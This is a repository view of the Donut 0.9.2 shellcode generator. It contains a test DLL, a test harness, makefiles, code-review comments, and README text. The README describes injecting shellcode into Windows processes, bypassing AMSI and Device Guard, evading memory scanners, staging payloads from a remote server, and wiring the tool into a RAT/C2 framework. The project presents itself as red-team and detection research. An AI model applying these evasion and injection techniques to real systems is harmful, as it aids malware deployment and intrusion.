New upstream version 0.9.2
Sophie Brun
4 years ago
0 | #define UNICODE | |
1 | ||
2 | #include <stdint.h> | |
3 | #include <stdio.h> | |
4 | #include <stdlib.h> | |
5 | #include <string.h> | |
6 | #include <sys/stat.h> | |
7 | #include <inttypes.h> | |
8 | ||
9 | #include <windows.h> | |
10 | #pragma comment(lib, "user32.lib") | |
11 | #pragma comment(lib, "shell32.lib") | |
12 | ||
13 | __declspec(dllexport) | |
14 | VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) { | |
15 | PROCESS_INFORMATION pi; | |
16 | STARTUPINFO si; | |
17 | ||
18 | ZeroMemory(&si, sizeof(si)); | |
19 | si.cb = sizeof(si); | |
20 | CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); | |
21 | ||
22 | ZeroMemory(&si, sizeof(si)); | |
23 | si.cb = sizeof(si); | |
24 | CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); | |
25 | } | |
26 | ||
27 | __declspec(dllexport) | |
28 | VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) { | |
29 | WCHAR msg[4096]; | |
30 | ||
31 | _snwprintf(msg, ARRAYSIZE(msg), | |
32 | L"param[0] : %ws\r" | |
33 | L"param[1] : %ws\r" | |
34 | L"param[2] : %ws\r" | |
35 | L"param[3] : %ws\r", | |
36 | arg0, arg1, arg2, arg3); | |
37 | ||
38 | MessageBox(NULL, msg, L"Donut Test", MB_OK); | |
39 | } | |
40 | ||
41 | __declspec(dllexport) | |
42 | BOOL WINAPI DllMain(HMODULE hModule, | |
43 | DWORD ul_reason_for_call, | |
44 | LPVOID lpReserved) { | |
45 | switch (ul_reason_for_call) { | |
46 | case DLL_PROCESS_ATTACH: | |
47 | MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0); | |
48 | break; | |
49 | case DLL_THREAD_ATTACH: | |
50 | case DLL_THREAD_DETACH: | |
51 | case DLL_PROCESS_DETACH: | |
52 | break; | |
53 | } | |
54 | return TRUE; | |
55 | } |
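Review bot: Both CreateProcess calls in RunProcess (lines 20 and 24) ignore the return value and never close pi.hProcess and pi.hThread, so every call leaks two handles into the host process for as long as it lives. Factoring the launch into a static helper that checks the result and closes both handles leaves the two call sites one line each, as below. Separately, _snwprintf on line 31 does not NUL-terminate msg when the four parameters together fill or exceed the 4096-character buffer, so MessageBox on line 38 can read past it; either use `_snwprintf_s(msg, ARRAYSIZE(msg), _TRUNCATE, ...)` or add `msg[ARRAYSIZE(msg) - 1] = L'\0';` after the call. The MessageBox in DllMain's DLL_PROCESS_ATTACH branch runs while the loader lock is held, which is tolerable for a test DLL but deserves a comment such as `// test-only: blocking UI from DllMain is not safe for a production DLL`.
```c
// Launch one process and release the two handles CreateProcess hands back.
static void start_process(PWCHAR cmd) {
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    if (CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}

__declspec(dllexport)
VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
    start_process(proc1);
    start_process(proc2);
}
```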
0 | ||
1 | ||
2 | // just some simple test cases to use with donut library | |
3 | ||
4 | #include "donut.h" | |
5 | ||
6 | typedef struct _test_case_t { | |
7 | int arch; | |
8 | int bypass; | |
9 | int inst_type; | |
10 | char *domain; | |
11 | char *cls; | |
12 | char *method; | |
13 | char *param; | |
14 | char *file; | |
15 | char *url; | |
16 | char *runtime; | |
17 | int err; // expected result based on test case | |
18 | } test_case; | |
19 | ||
20 | test_case tests[] = { | |
21 | // nothing supplied | |
22 | {0,0,0,"","","","","","","",DONUT_ERROR_INVALID_PARAMETER}, | |
23 | // requesting x86 shellcode for x64 DLL | |
24 | {DONUT_ARCH_X86,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","cls","method","param","hello_amd64.dll","","",DONUT_ERROR_ARCH_MISMATCH}, | |
25 | // requesting x64 shellcode for x86 DLL | |
26 | {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","","hello_x86.dll","","",DONUT_ERROR_ARCH_MISMATCH}, | |
27 | // supplying parameters for unmanaged DLL, but not function name | |
28 | {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_PARAM}, | |
29 | // supplying function name that can't be found in DLL | |
30 | {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","NoMethod","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_FUNCTION}, | |
31 | // supplying file that isn't recognized | |
32 | {DONUT_ARCH_ANY,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"","","","","/dev/null","","",DONUT_ERROR_FILE_INVALID}, | |
33 | // .NET DLL assembly with no method provided | |
34 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","","","class1.dll","","",DONUT_ERROR_NET_PARAMS}, | |
35 | // .NET DLL assembly with no class provided | |
36 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_NET_PARAMS}, | |
37 | // .NET DLL with good parameters | |
38 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_SUCCESS}, | |
39 | // invalid URL | |
40 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http:","",DONUT_ERROR_INVALID_URL}, | |
41 | // invalid URL length | |
42 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http://","",DONUT_ERROR_URL_LENGTH}, | |
43 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://","",DONUT_ERROR_URL_LENGTH}, | |
44 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://a","",DONUT_ERROR_SUCCESS}, | |
45 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll", | |
46 | "https://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
47 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
48 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
49 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
50 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
51 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
52 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
53 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
54 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
55 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", | |
56 | "",DONUT_ERROR_URL_LENGTH}, | |
57 | }; | |
58 | ||
59 | int main(void) | |
60 | { | |
61 | DONUT_CONFIG c; | |
62 | int err, i; | |
63 | ||
64 | for(i=0; i<sizeof(tests)/sizeof(test_case); i++) { | |
65 | memset(&c, 0, sizeof(c)); | |
66 | ||
67 | c.arch = tests[i].arch; | |
68 | c.bypass = tests[i].bypass; | |
69 | c.inst_type = tests[i].inst_type; | |
70 | ||
71 | strncpy(c.domain , tests[i].domain, sizeof(c.domain) - 1); | |
72 | strncpy(c.cls , tests[i].cls, sizeof(c.cls) - 1); | |
73 | strncpy(c.method , tests[i].method, sizeof(c.method) - 1); | |
74 | strncpy(c.param , tests[i].param, sizeof(c.param) - 1); | |
75 | strncpy(c.file , tests[i].file, sizeof(c.file) - 1); | |
76 | strncpy(c.url , tests[i].url, sizeof(c.url) - 1); | |
77 | strncpy(c.runtime, tests[i].runtime, sizeof(c.runtime) - 1); | |
78 | ||
79 | printf("Test Case # %2i ", (i+1)); | |
80 | err = DonutCreate(&c); | |
81 | DonutDelete(&c); | |
82 | ||
83 | printf("returned %2i : %s\n", | |
84 | err, err == tests[i].err ? "OK" : "FAILED"); | |
85 | } | |
86 | return 0; | |
87 | } |
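Review bot: main returns 0 on line 86 no matter how many cases printed FAILED, so a scripted run of this harness can never signal a regression; count mismatches and return non-zero, e.g. `int failed = 0;` before the loop, `if (err != tests[i].err) failed++;` after the comparison on line 84, and `return failed ? 1 : 0;`. The loop on line 64 compares the signed `i` against a size_t expression, which -Wextra reports under -Wsign-compare; declaring `size_t i` fixes it, and the `%2i` on line 79 then needs `(int)(i + 1)`. The strncpy calls on lines 71-77 rely on the memset on line 65 for NUL termination, which holds here, but they silently truncate the roughly 1250-character URL of the last test case to sizeof(c.url) - 1 before DonutCreate sees it, so whether that case reaches the intended DONUT_ERROR_URL_LENGTH path depends on how the library's length check relates to the field size — worth a comment on that case stating which length is actually under test.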
0 | BSD 3-Clause License | |
1 | ||
2 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
3 | ||
4 | Redistribution and use in source and binary forms, with or without | |
5 | modification, are permitted provided that the following conditions are met: | |
6 | ||
7 | * Redistributions of source code must retain the above copyright notice, this | |
8 | list of conditions and the following disclaimer. | |
9 | ||
10 | * Redistributions in binary form must reproduce the above copyright notice, | |
11 | this list of conditions and the following disclaimer in the documentation | |
12 | and/or other materials provided with the distribution. | |
13 | ||
14 | * Neither the name of the copyright holder nor the names of its | |
15 | contributors may be used to endorse or promote products derived from | |
16 | this software without specific prior written permission. | |
17 | ||
18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. |
0 | include README.md | |
1 | include Makefile* | |
2 | include LICENSE | |
3 | include version-release-notes.txt | |
4 | recursive-include . *.c | |
5 | recursive-include payload * | |
6 | recursive-include include * | |
7 | recursive-include docs * | |
8 | recursive-include lib *⏎ |
0 | donut: | |
1 | gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut | |
2 | gcc -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c payload/clib.c | |
3 | ar rcs lib/libdonut.a donut.o hash.o encrypt.o clib.o | |
4 | gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o clib.o | |
5 | debug: | |
6 | gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut | |
7 | clean: | |
8 | rm *.o donut lib/libdonut.a lib/libdonut.so |
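Review bot: The clean target on line 8 runs `rm` without `-f`, so `make clean` on a fresh checkout or after a partial build exits non-zero at the first missing file and stops; `rm -f *.o donut lib/libdonut.a lib/libdonut.so` is the usual form. The clean target in Makefile.mingw has the same issue. None of the three targets is declared `.PHONY`, so a stray file named `clean` or `debug` in the tree would silently satisfy the target; add `.PHONY: donut debug clean` at the top.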
0 | donut: | |
1 | x86_64-w64-mingw32-gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe | |
2 | debug: | |
3 | x86_64-w64-mingw32-gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe | |
4 | clean: | |
5 | rm donut.exe *.o |
0 | donut: | |
1 | cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c | |
2 | cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c | |
3 | move donut.lib lib/donut.lib | |
4 | move donut.exp lib/donut.exp | |
5 | move donut.dll lib/donut.dll | |
6 | debug: | |
7 | cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c | |
8 | cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c | |
9 | move donut.lib lib/donut.lib | |
10 | move donut.exp lib/donut.exp | |
11 | move donut.dll lib/donut.dll | |
12 | clean: | |
13 | del *.obj *.bin donut.exe lib/donut.exp lib/donut.lib lib/donut.dll |
0 | Metadata-Version: 2.1 | |
1 | Name: donut-shellcode | |
2 | Version: 0.9.2 | |
3 | Summary: Donut Python C extension | |
4 | Home-page: https://github.com/TheWover/donut | |
5 | Author: TheWover, Odzhan, byt3bl33d3r | |
6 | License: UNKNOWN | |
7 | Description: # Using Donut | |
8 | ||
9 | ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut") | |
10 | ||
11 | Version: 0.9.2 *please submit issues and requests for v1.0 release* | |
12 | ||
13 | Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/ | |
14 | ||
15 | TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/ | |
16 | ||
17 | v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/ | |
18 | ||
19 | ## Introduction | |
20 | ||
21 | Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
22 | ||
23 | It can be used in several ways. | |
24 | ||
25 | ## As a Standalone Tool | |
26 | ||
27 | Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below. | |
28 | ||
29 | ``` | |
30 | ||
31 | usage: donut [options] -f <EXE/DLL/VBS/JS/XSL> | |
32 | ||
33 | -MODULE OPTIONS- | |
34 | ||
35 | -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory. | |
36 | -u <URL> HTTP server that will host the donut module. | |
37 | ||
38 | -PIC/SHELLCODE OPTIONS- | |
39 | ||
40 | -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default). | |
41 | -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default) | |
42 | -o <payload> Output file. Default is "payload.bin" | |
43 | ||
44 | -DOTNET OPTIONS- | |
45 | ||
46 | -c <namespace.class> Optional class name. (required for .NET DLL) | |
47 | -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL) | |
48 | -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon. | |
49 | -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available. | |
50 | -d <name> AppDomain name to create for .NET. Randomly generated by default. | |
51 | ||
52 | examples: | |
53 | ||
54 | donut -f c2.dll | |
55 | donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll | |
56 | donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/ | |
57 | ||
58 | ``` | |
59 | ||
60 | ### Building Donut | |
61 | ||
62 | Tags have been provided for each release version of donut that contain the compiled executables. | |
63 | ||
64 | * v0.9.2, Bear Claw: | |
65 | * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2 | |
66 | * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1 | |
67 | * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9 | |
68 | ||
69 | However, you may also clone and build the source yourself using the provided makefiles. | |
70 | ||
71 | ## Building From Repository | |
72 | ||
73 | From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory. | |
74 | ||
75 | ``` | |
76 | git clone http://github.com/thewover/donut | |
77 | cd donut | |
78 | ``` | |
79 | ||
80 | ## Linux | |
81 | ||
82 | Simply run make to generate an executable, static and dynamic libraries. | |
83 | ||
84 | ``` | |
85 | make | |
86 | make clean | |
87 | make debug | |
88 | ``` | |
89 | ||
90 | ## Windows | |
91 | ||
92 | Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut: | |
93 | ||
94 | ``` | |
95 | nmake -f Makefile.msvc | |
96 | nmake clean -f Makefile.msvc | |
97 | nmake debug -f Makefile.msvc | |
98 | ``` | |
99 | ||
100 | ## As a Library | |
101 | ||
102 | donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` . | |
103 | ||
104 | ## As a Python Module | |
105 | ||
106 | Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3. | |
107 | ||
108 | ``` | |
109 | pip install . | |
110 | ``` | |
111 | ||
112 | Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory. | |
113 | ||
114 | ``` | |
115 | pip install donut-shellcode | |
116 | ``` | |
117 | ||
118 | ## As a Template - Rebuilding the shellcode | |
119 | ||
120 | *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut. | |
121 | ||
122 | ### Microsoft Visual Studio | |
123 | ||
124 | **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.** | |
125 | ||
126 | Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following: | |
127 | ||
128 | ``` | |
129 | nmake clean -f Makefile.msvc | |
130 | nmake -f Makefile.msvc | |
131 | ``` | |
132 | ||
133 | This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates. | |
134 | ||
135 | To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following: | |
136 | ||
137 | ``` | |
138 | nmake clean -f Makefile.msvc | |
139 | nmake x86 -f Makefile.msvc | |
140 | ``` | |
141 | ||
142 | This will save the shellcode as a C array to *payload_exe_x86.h*. | |
143 | ||
144 | ### Mingw-w64 | |
145 | ||
146 | Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following: | |
147 | ||
148 | ``` | |
149 | make clean -f Makefile.mingw | |
150 | make -f Makefile.mingw | |
151 | ``` | |
152 | ||
153 | Once you've recompiled for all architectures, you may rebuild donut. | |
154 | ||
155 | ## Bypasses | |
156 | ||
157 | Donut includes a bypass system for AMSI and other security features. Currently we bypass: | |
158 | ||
159 | * AMSI in .NET v4.8 | |
160 | * Device Guard policy preventing dynamicly generated code from executing | |
161 | ||
162 | You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c. | |
163 | ||
164 | Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used. | |
165 | ||
166 | Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using. | |
167 | ||
168 | Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined. | |
169 | ||
170 | If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded. | |
171 | ||
172 | Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research. | |
173 | ||
174 | ### Additional features. | |
175 | ||
176 | These are left as exercises to the reader. I would personally recommend: | |
177 | ||
178 | * Add environmental keying | |
179 | * Make donut polymorphic by obfuscating *payload* every time shellcode is generated | |
180 | * Integrate donut as a module into your favorite RAT/C2 Framework | |
181 | ||
182 | ## Disclaimers | |
183 | ||
184 | * No, we will not update donut to counter signatures or detections by any AV. | |
185 | * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. | |
186 | ||
187 | # How it works | |
188 | ||
189 | ## Procedure for Assemblies | |
190 | ||
191 | Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters. | |
192 | ||
193 | The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). | |
194 | ||
195 | Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces | |
196 | ||
197 | For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader | |
198 | ||
199 | Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README. | |
200 | ||
201 | ## Procedure for ActiveScript/XSL | |
202 | ||
203 | The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/). | |
204 | ||
205 | ## Procedure for PE Loading | |
206 | ||
207 | The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/). | |
208 | ||
209 | ## Components | |
210 | ||
211 | Donut contains the following elements: | |
212 | ||
213 | * donut.c: The source code for the donut payload generator | |
214 | * donut.exe: The compiled payload generator as an EXE | |
215 | * donut.py: The donut payload generator as a Python script *(planned for version 1.0)* | |
216 | * donutmodule.c: The CPython wrapper for Donut. Used by the Python module. | |
217 | * setup.py: The setup file for installing Donut as a Pip Python3 module. | |
218 | * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform | |
219 | * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform | |
220 | * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project | |
221 | * payload/payload.c: Main file for the shellcode. | |
222 | * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies. | |
223 | * payload/inmem_pe.c: In-Memory loader for EXE/DLL files. | |
224 | * payload/inmem_xml.c: In-Memory loader for XSL/XML files. | |
225 | * payload/inmem_script.c: In-Memory loader for VBScript/JScript files. | |
226 | * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files. | |
227 | * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support. | |
228 | * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP) | |
229 | * payload/http_client.c: Downloads a module from remote staging server into memory. | |
230 | * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB). | |
231 | * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset. | |
232 | * payload/inject.exe: The compiled C shellcode injector | |
233 | * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing. | |
234 | * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible | |
235 | * payload/runsc.exe: The compiled C shellcode runner | |
236 | * payload/exe2h/exe2h.c: Source code for exe2h | |
237 | * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file | |
238 | * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption. | |
239 | * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing. | |
240 | ||
241 | # Subprojects | |
242 | ||
243 | There are three companion projects provided with donut: | |
244 | ||
245 | * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute. | |
246 | * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string. | |
247 | * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly. | |
248 | * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. | |
249 | ||
250 | # Project plan | |
251 | ||
252 | * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~ | |
253 | * Create a C# version of the generator. | |
254 | * Create a donut.py generator that uses the same command-line parameters as donut.exe. | |
255 | * Add support for HTTP proxies. | |
256 | ~~* Find ways to simplify the shellcode if possible.~~ | |
257 | * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it. | |
258 | * ~~Dynamic Calls to DLL functions.~~ | |
259 | * Handle the ProcessExit event from AppDomain using unmanaged code. | |
260 | ||
261 | Platform: UNKNOWN | |
262 | Requires-Python: >=3.0 | |
263 | Description-Content-Type: text/markdown |
